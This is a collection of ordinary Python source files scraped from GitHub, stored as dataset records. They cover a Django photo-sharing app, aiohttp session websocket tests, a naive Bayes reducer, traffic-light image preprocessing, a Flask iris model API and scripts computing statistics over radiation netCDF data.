DESC Model with 1-RC\\n')\nf.write('\\r\\n')\nfor erhan in range(len(temps)):\n f.write('Simulated Output Voltage RMSE=%2.2fmV at %02d°C Temp\\n' % (rmse[erhan]*1000, temps[erhan])) \nf.write('\\r\\n')\nf.write(\"Start Time =\" + start)\nf.write(\"\\nStop Time =\" + stop)\nf.write('\\n')\nf.close() # Close the file.\n\n","repo_name":"ErhanYILMAZ/DESC_Model","sub_path":"DESC_Simulation.py","file_name":"DESC_Simulation.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37399439812","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\n\nf = open(\"train_dict\", 'r')\ncount_dict={}\nlines = f.readlines();\nfor line in lines:\n line=line.strip()\n word,label,count = line.split('\\t')\n if(word==\"ANY\"):\n count_dict[label]=int(count)\n \n else:\n break;\n\n\n\nsf=0.1\nvsize=483243\nprevword=None\nword_class_dict={}\nindex_label_dict={}\nword_prob={}\n# input comes from STDIN (standard input)\nfor line in sys.stdin:\n line=line.strip()\n word,label,count = line.split('\\t')\n word=word.strip();\n if(label in count_dict.keys()):\n if(word!=prevword):\n word_class_dict={}\n word_prob={}\n prevword=word\n word_class_dict[label]=int(count);\n else:\n if(bool(word_class_dict)):\n for l in count_dict.keys():\n if(word_class_dict.get(l)==None):\n if(word_prob.get(word+'^'+l)==None):\n word_prob[word+'^'+l]=math.log(sf/(count_dict.get(l)+sf*vsize))\n if(index_label_dict.get(label+'^'+l)==None):\n index_label_dict[label+'^'+l]=int(count)*word_prob[word+'^'+l]\n else:\n index_label_dict[label+'^'+l]=index_label_dict[label+'^'+l]+int(count)*word_prob[word+'^'+l]\n else:\n if(word_prob.get(word+'^'+l)==None):\n word_prob[word+'^'+l]=math.log((word_class_dict.get(l)+sf)/(count_dict.get(l)+sf*vsize))\n if(index_label_dict.get(label+'^'+l)==None):\n index_label_dict[label+'^'+l]= int(count)*word_prob[word+'^'+l]\n else:\n index_label_dict[label+'^'+l]=index_label_dict[label+'^'+l]+int(count)*word_prob[word+'^'+l]\n \nfor key,value in index_label_dict.items():\n index,label=key.split('^')\n score=value\n \n print('%s\\t%s\\t%s' % (index,label,score))\n \n\n","repo_name":"chaikesh/DS-222_Assignment-01","sub_path":"Hadoop_map-reduce/Codes/reducer2.py","file_name":"reducer2.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15755438878","text":"from django.shortcuts import render, redirect, get_object_or_404, HttpResponseRedirect\nfrom django.views.decorators.http import require_GET, require_POST, require_http_methods\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import JsonResponse, HttpResponseBadRequest\nfrom .models import Post, Image, HashTag\nfrom .forms import PostModelForm, ImageModelForm, CommentModelForm\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef create_post(request):\n # POST 방식으로 넘온 Data 를 ModelForm 에 넣는다.\n if request.method == 'POST':\n # POST 방식으로 넘온 Data 를 ModelForm 에 넣는다.\n # ModelForm(data, files) - default\n post_form = PostModelForm(request.POST)\n # Data 검증을 한다.\n if post_form.is_valid():\n post = post_form.save(commit=False)\n post.user = request.user\n post.save()\n # Create HashTag => \n content = post_form.cleaned_data.get('content')\n words = content.split(' ') # 띄어쓰기 기준으로 split\n for word in words:\n if word[0] == '#':\n word = word[1:]\n tag = HashTag.objects.get_or_create(content=word) # (HashTagobj, True or False)\n post.tags.add(tag[0])\n if tag[1]:\n messages.add_message(request, messages.SUCCESS, f'#{tag[0].content}태그를 처음으로 추가하셨어요! :)')\n for image in request.FILES.getlist('file'): # 여러 장의 사진은 리스트로 저장되어 들어온다.\n request.FILES['file'] = image\n image_form = ImageModelForm(files=request.FILES)\n if image_form.is_valid():\n image = image_form.save(commit=False) # ForeignKey 가 없는 상태\n image.post = post\n image.save()\n return redirect('posts:post_list')\n\n # GET 방식으로 요청이 오면,\n else:\n # 새로운 Post 용 form 을 만든다.\n post_form = PostModelForm()\n image_form = ImageModelForm()\n\n # 사용자에게 html 과 form을 만든다.\n return render(request, 'posts/form.html', {\n 'post_form': post_form,\n 'image_form': image_form,\n })\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef update_post(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n if post.user == request.user: # 지금 수정하려는 post 작성자가 요청 보낸 사람이냐?\n if request.method == 'POST':\n post_form = PostModelForm(request.POST, instance=post)\n if post_form.is_valid():\n post_form.save()\n # update HashTag\n post.tags.clear() # 기존 태그 다 날리기\n content = post_form.cleaned_data.get('content')\n words = content.split(' ') # 띄어쓰기 기준으로 split\n for word in words:\n if word[0] == '#':\n word = word[1:]\n tag = HashTag.objects.get_or_create(content=word) # (HashTagobj, True or False)\n post.tags.add(tag[0])\n return redirect('posts:post_list')\n else:\n post_form = PostModelForm(instance=post)\n else: # 작성자와 요청 보낸 user 가 다르다면\n # 403 : Forbidden 금지됨!\n return redirect('posts:post_list')\n\n return render(request, 'posts/form.html', {\n 'post_form': post_form\n })\n\n\n@require_GET\ndef post_list(request):\n if request.GET.get('next'):\n return redirect(request.GET.get('next'))\n posts = Post.objects.all()\n comment_form = CommentModelForm()\n\n return render(request, 'posts/list.html', {\n 'posts': posts,\n 'comment_form': comment_form,\n })\n\n\n@login_required\n@require_POST\ndef create_comment(request, post_id):\n post = get_object_or_404(Post, id=post_id)\n comment_form = CommentModelForm(request.POST)\n if comment_form.is_valid():\n comment = comment_form.save(commit=False)\n comment.user = request.user\n comment.post = post\n comment.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/insta/'))\n # TODO else: => What if comment is not valid?\n\n\n@login_required\n@require_POST\ndef toggle_like(request, post_id):\n if request.is_ajax():\n user = request.user\n post = get_object_or_404(Post, id=post_id)\n is_active = True\n # if post.like_users.filter(id=user.id): # 찾으면, [value] / 없으면 []\n if user in post.like_users.all():\n post.like_users.remove(user)\n is_active = False\n else:\n post.like_users.add(user)\n\n return JsonResponse({\n 'likeCount': post.like_users.count(),\n 'is_active': is_active,\n })\n else:\n return HttpResponseBadRequest()\n\n@require_GET\ndef tag_posts_list(request, tag_name):\n tag = get_object_or_404(HashTag, content=tag_name)\n posts = tag.posts.all()\n comment_form = CommentModelForm()\n return render(request, 'posts/list.html', {'posts': posts, 'comment_form': comment_form, 'h1': f'#{tag}를 포함한 posts 입니다.'})\n","repo_name":"Nenemttin/TIL","sub_path":"07_django/INSTA/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9162808444","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('entrances', '0009_auto_20141110_1309'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='apartment',\n options={'ordering': ('floor', 'apartment_integer'), 'verbose_name': 'Apartment', 'verbose_name_plural': 'Apartments'},\n ),\n ]\n","repo_name":"Happyandhappy/django_email","sub_path":"entrances/migrations/0010_auto_20141112_0949.py","file_name":"0010_auto_20141112_0949.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2361264495","text":"import asyncio\nimport json\nimport time\nfrom unittest.mock import Mock\nimport uuid\n\nfrom aiohttp import CookieJar, WSMessage, WSMsgType, web\nfrom aiohttp.test_utils import make_mocked_request\nimport aiohttp_session\nimport pytest\n\nfrom aiohttp_session_ws import (\n DEFAULT_SESSION_KEY,\n REGISTRY_KEY,\n SessionWSRegistry,\n __version__,\n delete_session_ws_id,\n ensure_session_ws_id,\n get_session_ws_id,\n new_session_ws_id,\n schedule_close_all_session_ws,\n session_ws,\n session_ws_middleware,\n setup as setup_session_ws,\n)\n\n# pylint: disable=C0103, invalid-name\n# pylint: disable=R0201, no-self-use\n# pylint: disable=W0621, redefined-outer-name\n\n\ndef make_mock_wsr():\n return Mock(spec=web.WebSocketResponse)\n\n\n@pytest.fixture\ndef async_mock_call():\n async def async_mock_call_(*args, **kwargs):\n return (args, kwargs)\n\n return async_mock_call_\n\n\n@pytest.fixture\ndef registry():\n return SessionWSRegistry()\n\n\n@pytest.fixture\ndef req(registry):\n return make_mocked_request(\"GET\", \"/\", app={REGISTRY_KEY: registry})\n\n\n@pytest.fixture\ndef wsr():\n return make_mock_wsr()\n\n\n@pytest.fixture\ndef cookie_jar(event_loop):\n return CookieJar(unsafe=True, loop=event_loop)\n\n\n@pytest.fixture\ndef client(event_loop, app, cookie_jar):\n from aiohttp.test_utils import TestServer, TestClient\n\n _server = TestServer(app, loop=event_loop)\n _client = TestClient(_server, loop=event_loop, cookie_jar=cookie_jar)\n event_loop.run_until_complete(_client.start_server())\n yield _client\n event_loop.run_until_complete(_client.close())\n\n\ndef test_version():\n assert __version__ == \"1.1.1\"\n\n\n@pytest.mark.asyncio\nasync def test_get_session_ws_id(registry, req, async_mock_call):\n registry.get_id = async_mock_call\n assert await get_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_new_session_ws_id(registry, req, async_mock_call):\n registry.new_id = async_mock_call\n assert await new_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_delete_session_ws_id(registry, req, async_mock_call):\n registry.delete_id = async_mock_call\n assert await delete_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_ensure_session_ws_id(registry, req, async_mock_call):\n registry.ensure_id = async_mock_call\n assert await ensure_session_ws_id(req) == ((req,), {})\n\n\n@pytest.mark.asyncio\nasync def test_schedule_close_all_session_ws(registry, req, async_mock_call):\n resp = Mock()\n registry.schedule_close_all_session = async_mock_call\n assert await schedule_close_all_session_ws(req, resp) == ((req, resp), {})\n\n\n@pytest.mark.asyncio\nasync def test_session_ws_middleware(req, registry, async_mock_call):\n response = web.Response()\n registry.ensure_id = Mock(side_effect=async_mock_call)\n\n async def handler(request): # pylint: disable=W0613, unused-argument\n return response\n\n returned_response = await session_ws_middleware(req, handler)\n assert response is returned_response\n registry.ensure_id.assert_called_once_with(req)\n\n\n@pytest.mark.asyncio\nasync def test_setup(registry, async_mock_call):\n event = asyncio.Event()\n response = Mock(spec=web.WebSocketResponse)\n response.close = event.wait\n registry.close_all = Mock(side_effect=async_mock_call)\n\n registry._registry[0] = set([response])\n app = web.Application()\n setup_session_ws(app, registry)\n app.freeze()\n\n assert app[REGISTRY_KEY] == registry\n\n fut = asyncio.ensure_future(app.shutdown())\n event.set()\n await asyncio.sleep(.01)\n assert fut.done()\n assert not fut.exception()\n registry.close_all.assert_called_once_with()\n\n\nCOOKIE_NAME = \"AIOHTTP_SESSION_WEBSOCKET\"\n\n\ndef get_session_data(resp):\n return json.loads(resp.cookies[COOKIE_NAME].value).get(\"session\", {})\n\n\ndef make_cookie(data):\n return json.dumps({\"session\": data, \"created\": int(time.time())})\n\n\nclass TestSessionWS:\n @pytest.fixture\n def app(self):\n async def handle_websocket(request):\n async with session_ws(request) as wsr:\n session_ws_id = await get_session_ws_id(request)\n async for msg in wsr: # pylint: disable=W0612, unused-variable\n await wsr.send_str(str(session_ws_id))\n return wsr\n\n app = web.Application(\n middlewares=[\n aiohttp_session.session_middleware(\n aiohttp_session.SimpleCookieStorage(cookie_name=COOKIE_NAME)\n )\n ]\n )\n app.router.add_get(\"/ws\", handle_websocket)\n\n setup_session_ws(app, SessionWSRegistry())\n return app\n\n @pytest.mark.asyncio\n async def test_without_session(self, app, client):\n wsr = await client.ws_connect(\"/ws\")\n wsr_resp = wsr._response\n wsr_session_data = get_session_data(wsr_resp)\n session_ws_id = wsr_session_data[DEFAULT_SESSION_KEY]\n assert len(app[REGISTRY_KEY][session_ws_id]) == 1\n\n await wsr.close()\n assert session_ws_id not in app[REGISTRY_KEY]\n\n @pytest.mark.asyncio\n async def test_with_session(self, app, client, cookie_jar):\n data = {DEFAULT_SESSION_KEY: 0}\n cookie_jar.update_cookies({COOKIE_NAME: make_cookie(data)})\n wsr = await client.ws_connect(\"/ws\")\n assert COOKIE_NAME not in wsr._response.cookies\n assert data[DEFAULT_SESSION_KEY] in app[REGISTRY_KEY]\n\n await wsr.close()\n assert data[DEFAULT_SESSION_KEY] not in app[REGISTRY_KEY]\n\n @pytest.mark.asyncio\n async def test_inner(self, app, client, cookie_jar):\n data = {DEFAULT_SESSION_KEY: 0}\n cookie_jar.update_cookies({COOKIE_NAME: make_cookie(data)})\n wsr = await client.ws_connect(\"/ws\")\n await wsr.send_str(\"...\")\n\n resp = await wsr.receive()\n assert isinstance(resp, WSMessage)\n assert resp.data == \"0\"\n await wsr.close()\n assert data[DEFAULT_SESSION_KEY] not in app[REGISTRY_KEY]\n\n\nclass TestSessionWSRegistry:\n @staticmethod\n def make_request_session_tuple(session_ws_id=None):\n request = make_mocked_request(\"GET\", \"/\")\n session = aiohttp_session.Session(\n \"identity\",\n data={\n \"created\": int(time.time()),\n \"session\": {DEFAULT_SESSION_KEY: session_ws_id},\n }\n if session_ws_id\n else {\"created\": int(time.time())},\n new=True,\n )\n request[aiohttp_session.SESSION_KEY] = session\n return request, session\n\n def test__getitem__(self, registry, wsr):\n registry._registry[0] = set([wsr])\n assert registry[0] == set([wsr])\n\n def test__iter__(self, registry, wsr):\n registry._registry[0] = set([wsr])\n assert list(registry) == [0]\n\n def test__len__(self, registry, wsr):\n registry._registry[0] = set([wsr])\n assert len(registry) == 1\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"session_ws_id\"),\n [pytest.param(None, id=\"missing\"), pytest.param(\"dummy\", id=\"exists\")],\n )\n async def test_get_id(self, registry, session_ws_id):\n # pylint: disable=W0612, unused-variable\n request, session = self.make_request_session_tuple(session_ws_id)\n assert await registry.get_id(request) == session_ws_id\n\n @pytest.mark.asyncio\n async def test_new_id_with_default_id_factory(self, registry):\n request, session = self.make_request_session_tuple()\n await registry.new_id(request)\n\n session_id = session[DEFAULT_SESSION_KEY]\n assert uuid.UUID(session_id)\n\n @pytest.mark.asyncio\n async def test_async_id_factory(self):\n called_with = None\n\n async def dummy_id_factory(request):\n nonlocal called_with\n called_with = request\n return id(request)\n\n registry = SessionWSRegistry(id_factory=dummy_id_factory)\n request, session = self.make_request_session_tuple()\n await registry.new_id(request)\n\n assert called_with == request\n assert session[DEFAULT_SESSION_KEY] == id(request)\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"session_ws_id\"),\n [pytest.param(None, id=\"missing\"), pytest.param(\"dummy\", id=\"exists\")],\n )\n async def test_delete_id(self, session_ws_id, registry):\n request, session = self.make_request_session_tuple(session_ws_id)\n await registry.delete_id(request)\n assert DEFAULT_SESSION_KEY not in session\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"initial\", \"factory\", \"expected\"),\n [\n pytest.param(None, lambda req: \"found\", \"found\", id=\"missing\"),\n pytest.param(\"dummy\", lambda req: ..., \"dummy\", id=\"exists\"),\n ],\n )\n async def test_ensure_id(self, initial, factory, expected):\n registry = SessionWSRegistry(id_factory=factory)\n request, session = self.make_request_session_tuple(initial)\n await registry.ensure_id(request)\n assert session[DEFAULT_SESSION_KEY] == expected\n\n @pytest.mark.asyncio\n async def test_schedule_close_all_session(self, registry):\n event = asyncio.Event()\n registry.close_all_session = Mock(\n side_effect=registry.close_all_session\n )\n response = Mock(spec=web.Response)\n\n # pylint: disable=W0612, unused-variable\n request, session = self.make_request_session_tuple(\"dummy\")\n request._task = asyncio.ensure_future(event.wait())\n\n await registry.schedule_close_all_session(request, response)\n registry.close_all_session.assert_not_called()\n response.force_close.assert_called_once_with()\n\n event.set()\n await asyncio.sleep(.01)\n registry.close_all_session.assert_called_once_with(\"dummy\")\n\n @pytest.mark.asyncio\n async def test_close_all(self, registry, wsr):\n event = asyncio.Event()\n wsr.close = event.wait\n registry._registry[0] = set([wsr])\n\n fut = asyncio.ensure_future(registry.close_all())\n event.set()\n await asyncio.sleep(.01)\n assert fut.done()\n assert not fut.exception()\n\n @pytest.mark.asyncio\n async def test_close_all_session(self, registry, wsr):\n event = asyncio.Event()\n wsr.close = event.wait\n\n registry._registry[0] = set([wsr])\n\n fut = asyncio.ensure_future(registry.close_all_session(0))\n event.set()\n await asyncio.sleep(.01)\n assert fut.done()\n assert not fut.exception()\n\n def test_register(self, registry, wsr):\n registry.register(0, wsr)\n assert dict(registry) == {0: set([wsr])}\n\n def test_unregister_missing(self, registry, wsr):\n \"\"\"\n Doesn't raise.\n \"\"\"\n registry.unregister(0, wsr)\n\n def test_unregister_last(self, registry, wsr):\n \"\"\"\n Removes key-value pair from registry\n \"\"\"\n registry._registry[0] = set([wsr])\n registry.unregister(0, wsr)\n assert 0 not in registry\n\n def test_unregister_not_last(self, wsr):\n \"\"\"\n KVP remains\n \"\"\"\n registry = SessionWSRegistry()\n wsr2 = make_mock_wsr()\n registry._registry[0] = set([wsr, wsr2])\n registry.unregister(0, wsr)\n assert registry.get(0) == set([wsr2])\n\n\nclass TestIntegration:\n @pytest.fixture\n def app(self):\n async def handle_root(request):\n # pylint: disable=W0613, unused-argument\n return web.Response(text=\"root\")\n\n async def handle_clear(request):\n response = web.Response(text=\"clear\")\n await schedule_close_all_session_ws(request, response)\n return response\n\n async def handle_websocket(request):\n async with session_ws(request) as wsr:\n # pylint: disable=W0613, unused-argument\n async for msg in wsr:\n await wsr.send_str(msg.data)\n return wsr\n\n app = web.Application(\n middlewares=[\n aiohttp_session.session_middleware(\n aiohttp_session.SimpleCookieStorage(cookie_name=COOKIE_NAME)\n ),\n session_ws_middleware,\n ]\n )\n app.router.add_get(\"/\", handle_root)\n app.router.add_get(\"/clear\", handle_clear)\n app.router.add_get(\"/ws\", handle_websocket)\n\n setup_session_ws(app, SessionWSRegistry())\n return app\n\n @pytest.mark.asyncio\n @pytest.mark.parametrize(\n (\"initial\",),\n [pytest.param(0, id=\"exists\"), pytest.param(None, id=\"dne\")],\n )\n async def test_receive_session_ws(self, client, initial, cookie_jar):\n data = {DEFAULT_SESSION_KEY: initial} if initial else {}\n cookie_jar.update_cookies({COOKIE_NAME: make_cookie(data)})\n resp = await client.get(\"/\")\n\n session_data = get_session_data(resp)\n assert DEFAULT_SESSION_KEY in session_data\n\n @pytest.mark.asyncio\n async def test_close_session_ws(self, client):\n wsr = await client.ws_connect(\"/ws\")\n wsr_resp = wsr._response\n wsr_session_data = get_session_data(wsr_resp)\n assert wsr_session_data.get(DEFAULT_SESSION_KEY)\n\n clear_resp = await client.get(\"/clear\")\n assert clear_resp.status == 200\n\n wsr_msg = await wsr.receive()\n assert wsr_msg.type is WSMsgType.CLOSE\n assert wsr.closed\n","repo_name":"dfee/aiohttp_session_ws","sub_path":"tests/test_aiohttp_session_ws.py","file_name":"test_aiohttp_session_ws.py","file_ext":"py","file_size_in_byte":13496,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14181805123","text":"import os\r\nimport glob\r\nimport random\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom tfl_maneger.part1_api import find_tfl_lights\r\n\r\n\r\ndef find_a_not_tfl(gt_im):\r\n while True:\r\n not_tfl_y = random.randint(0, len(gt_im) - 5)\r\n not_tfl_x = random.randint(0, len(gt_im[0]) - 5)\r\n if gt_im[not_tfl_y, not_tfl_x] != 19:\r\n return (not_tfl_x, not_tfl_y)\r\n\r\n\r\ndef crop_image(image, x, y):\r\n left = max(x - 41, 0)\r\n right = min(x + 40, len(image[0]) - 1)\r\n top = max(y - 41, 0)\r\n bottom = min(y + 40, len(image) - 1)\r\n left_add = abs(min(x - 41, 0))\r\n right_add = max(x + 40 - (len(image[0]) - 1), 0)\r\n top_add = abs(min(y - 41, 0))\r\n bottom_add = max(y + 40 - (len(image) - 1), 0)\r\n image = image[top:bottom, left:right]\r\n result = np.hstack((np.hstack((np.zeros((len(image), left_add, 3)), image)), np.zeros((len(image), right_add, 3))))\r\n result = np.vstack(\r\n (np.vstack((np.zeros((top_add, len(result[0]), 3)), result)), np.zeros((bottom_add, len(result[0]), 3))))\r\n return result\r\n\r\n\r\ndef configure_image(image, path):\r\n print(\"========================\")\r\n gt_im = image.replace('leftImg8bit', 'gtFine')[:-4] + '_labelIds.png'\r\n image = np.array(Image.open(image))\r\n gt_im = np.array(Image.open(gt_im))\r\n red_x, red_y, green_x, green_y = find_tfl_lights(image, some_threshold=42)\r\n cropped_im = []\r\n labels = []\r\n i = 0\r\n susp_to_tfl = []\r\n for x, y in zip(red_x + green_x, red_y + green_y):\r\n if gt_im[y, x] == 19:\r\n i += 1\r\n cropped_im.append(crop_image(image, x, y))\r\n labels.append(1)\r\n else:\r\n susp_to_tfl.append((x, y))\r\n susp = min(i // 2, len(susp_to_tfl))\r\n for j in range(susp):\r\n cropped_im.append(crop_image(image, susp_to_tfl[j][0], susp_to_tfl[j][1]))\r\n labels.append(0)\r\n for k in range(i - susp):\r\n not_tfl = find_a_not_tfl(gt_im)\r\n cropped_im.append(crop_image(image, not_tfl[0], not_tfl[1]))\r\n labels.append(0)\r\n\r\n return cropped_im, labels\r\n\r\n\r\ndef bin_file(data, labels, path):\r\n data_array = np.array(data, dtype='uint8')\r\n f = open(f'db/Net dataset/{path}/data.bin', \"ab\")\r\n data_array.tofile(f)\r\n f.close()\r\n label_array = np.array(labels, dtype='uint8')\r\n f = open(f'db/Net dataset/{path}/labels.bin', \"ab\")\r\n label_array.tofile(f)\r\n f.close()\r\n\r\n\r\ndef prepare_set(path):\r\n set = f'./db/leftImg8bit/{path}/'\r\n\r\n set_images = glob.glob(os.path.join(set, '*/*_leftImg8bit.png'))\r\n cropped_im = []\r\n labels = []\r\n for im in set_images:\r\n image_cropped, image_labels = configure_image(im, path)\r\n cropped_im += image_cropped\r\n labels += image_labels\r\n bin_file(cropped_im, labels, path)\r\n\r\n\r\ndef show_label(path, index):\r\n data_file = np.memmap(f'db/Net dataset/{path}/data.bin', offset=index * (81 * 81 * 3), shape=(81, 81, 3))\r\n label_file = np.memmap(f'db/Net dataset/{path}/labels.bin', offset=index, shape=(1,))\r\n plt.imshow(data_file)\r\n if label_file == 0:\r\n plt.title(\"no traffic light\")\r\n else:\r\n plt.title(\"traffic light\")\r\n plt.show()\r\n print(label_file)\r\n\r\n\r\nif __name__ == '__main__':\r\n prepare_set('train')\r\n prepare_set('val')\r\n pass","repo_name":"Chavi100/Mobileye-project","sub_path":"part2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"747528070","text":"from flask import Flask, jsonify, request\nimport pickle\n\napp=Flask(__name__)\n\nmodel=pickle.load(open('iris_reg.pkl','rb'))\n\n@app.route('/')\ndef status():\n return jsonify({'massage':'status active'})\n\n@app.route('/predict_sepal_length',methods=['POST'])\ndef sepal_length():\n data=request.get_json()\n print(data)\n SepalWidthCm=data['SepalWidthCm']\n print('SepalWidthCm : ',SepalWidthCm)\n PetalLengthCm=data['PetalLengthCm']\n print('PetalLengthCm:',PetalLengthCm)\n PetalWidthCm=data['PetalWidthCm']\n print('PetalWidthCm : ',PetalWidthCm)\n Species=data['Species']\n print('Species : ',Species)\n\n if Species=='Iris-setosa':\n Species=0\n elif Species=='Iris-versicolor':\n Species=1\n elif Species=='Iris-verginica':\n Species=2\n\n print('encoded species : ',Species)\n\n test_array=[SepalWidthCm,PetalLengthCm,PetalWidthCm,Species]\n prediction = model.predict([test_array])\n\n return jsonify ({'predicted sepal length is':prediction[0]})\n\nif __name__=='__main__':\n app.run(debug=True)\n","repo_name":"deshmukhpragat/mayproject","sub_path":"iris_reg.py","file_name":"iris_reg.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72923604648","text":"\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 15 14:54:07 2021\n\n@author: yaoyichen\n\"\"\"\n\nimport os\nimport netCDF4 as nc\nimport numpy as np\nimport numpy.ma as ma\nimport matplotlib.pyplot as plt\nfrom radiation_copy import get_filedetail_from_folder\n\n\ndef fun1():\n\n \"\"\"\n 获得不同变量的mean variance \n \"\"\"\n\n # nc_file = \"rrtmg4nn.nc\"\n # root_dir = \"/Users/yaoyichen\"\n # root_dir = \"../../data/radiation/\"\n\n\n # nc_file = \"rrtmg4nn.nc\"\n # root_dir = \"/Users/yaoyichen/dataset/radiation/MPAS/data_1day\"\n\n # nc_file = \"rrtmg4nn_00000.000.nc\"\n # root_dir = \"/Users/yaoyichen/dataset/radiation/MPAS/data_1year\"\n\n nc_file = \"/home/eason.yyc/data/radiation/fullyear_data/fullyear_trainset_20_5_useful.nc\"\n root_dir = \"\"\n\n\n full_file_path = os.path.join(root_dir, nc_file)\n df = nc.Dataset(full_file_path)\n\n variable_list = [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"landfrac\", \"sicefrac\", \"snow\", \"solc\", \"tsfc\", \"emiss\", \"ccl4vmr\", \"cfc11vmr\", \"cfc12vmr\", \"cfc22vmr\",\n \"ch4vmr\", \"cldfrac\", \"co2vmr\", \"n2ovmr\", \"o2vmr\", \"o3vmr\", \"play\", \"qc\", \"qg\", \"qi\", \"qr\", \"qs\", \"qv\", \"tlay\", 'swuflx', 'swdflx', 'lwuflx', 'lwdflx']\n result = {}\n\n for variable_name in variable_list:\n\n data = df.variables[variable_name][:]\n if variable_name in [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"solc\", \"swuflx\", \"swdflx\",\"swhr\"]:\n data[data < 0.0] = 0.0\n\n mean_value = ma.getdata(np.mean(data)).astype(float)\n scale_value = ma.getdata(np.std(data))\n stat = {\"mean\": float(mean_value), \"scale\": float(scale_value)}\n result[variable_name] = stat\n print(result)\n\n\ndef fun2():\n nc_file = \"rrtmg4nn.nc\"\n # root_dir = \"/Users/yaoyichen\"\n root_dir = \"../../data/radiation/\"\n\n full_file_path = os.path.join(root_dir, nc_file)\n df = nc.Dataset(full_file_path)\n\n temp = np.asarray(df.variables[\"ch4vmr\"]).astype(float)\n plt.hist(temp.max(axis=0), bins=200)\n\n\ndef fun3():\n \"\"\"\n 获得文件夹下的所有文件\n \"\"\"\n source_folder = \"/home/eason.yyc/data/radiation/fullyear_data/\"\n endswith_str = None\n startswith_str = \"rrtmg\"\n\n file_mapping_source = get_filedetail_from_folder(source_folder, endswith_str = endswith_str, startswith_str = startswith_str)\n\n for key,value in file_mapping_source.items():\n print(key, value)\n \n\ndef fun4():\n \"\"\"\n 获得文件夹下的所有文件\n \"\"\"\n source_folder = \"/home/eason.yyc/data/radiation/fullyear_data/\"\n endswith_str = None\n startswith_str = \"rrtmg\"\n\n file_mapping_source = get_filedetail_from_folder(source_folder, endswith_str = endswith_str, startswith_str = startswith_str)\n\n\n variable_list = [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"landfrac\", \"sicefrac\", \"snow\", \"solc\", \"tsfc\", \"emiss\", \"ccl4vmr\", \"cfc11vmr\", \"cfc12vmr\", \"cfc22vmr\",\n \"ch4vmr\", \"cldfrac\", \"co2vmr\", \"n2ovmr\", \"o2vmr\", \"o3vmr\", \"play\", \"qc\", \"qg\", \"qi\", \"qr\", \"qs\", \"qv\", \"tlay\", 'swuflx', 'swdflx', 'lwuflx', 'lwdflx', 'swhr', 'lwhr']\n result = {}\n\n \n for key,value in file_mapping_source.items():\n \n df = nc.Dataset(key)\n\n for variable_name in variable_list:\n\n data = df.variables[variable_name][:]\n if variable_name in [\"aldif\", \"aldir\", \"asdif\", \"asdir\", \"cosz\", \"solc\", \"swuflx\", \"swdflx\",\"swhr\"]:\n data[data < 0.0] = 0.0\n\n mean_value = ma.getdata(np.mean(data)).astype(float)\n scale_value = ma.getdata(np.std(data))\n\n if(variable_name not in result):\n stat = {\"mean\": float(mean_value), \"scale\": float(scale_value), \"count\":1.0}\n result[variable_name] = stat\n\n else:\n result_mean = (result[variable_name][\"mean\"]* result[variable_name][\"count\"] + mean_value)/(result[variable_name][\"count\"] + 1.0) \n\n \"\"\"\n 方差 + 均值绝对值之和\n \"\"\"\n result_std = (result[variable_name][\"scale\"]* result[variable_name][\"count\"] + scale_value)/(result[variable_name][\"count\"] + 1.0) + np.abs(result[variable_name][\"mean\"] - mean_value)/5.0\n\n result_count = result[variable_name][\"count\"] + 1.0\n \n stat = {\"mean\": float(result_mean), \"scale\": float(result_std), \"count\":result_count}\n result[variable_name] = stat\n\n\n print(result) \n\n\n\ndef fun_calculate_wrf_statistics():\n from make_wrfRRTMG_data import train_dict, WrfRRTMGDataset\n from config import norm_mapping_standard\n from torch.utils.data import Dataset, DataLoader\n import torch\n dateset = WrfRRTMGDataset(vertical_layers = 57, type = \"train\", norm_mapping= norm_mapping_standard)\n dataLoader = DataLoader(dataset= dateset)\n counter = 0\n for batch_idx, (feature, targets, auxis) in enumerate(dataLoader): \n if( batch_idx ==0):\n feature_mean = torch.mean(feature,dim = [0,1,3])\n targets_mean = torch.mean(targets,dim = [0,1,3])\n auxis_mean = torch.mean(auxis,dim = [0,1,3])\n else:\n feature_mean += torch.mean(feature,dim = [0,1,3])\n targets_mean += torch.mean(targets,dim = [0,1,3])\n auxis_mean += torch.mean(auxis,dim = [0,1,3])\n counter += 1\n\n print(feature_mean/counter)\n 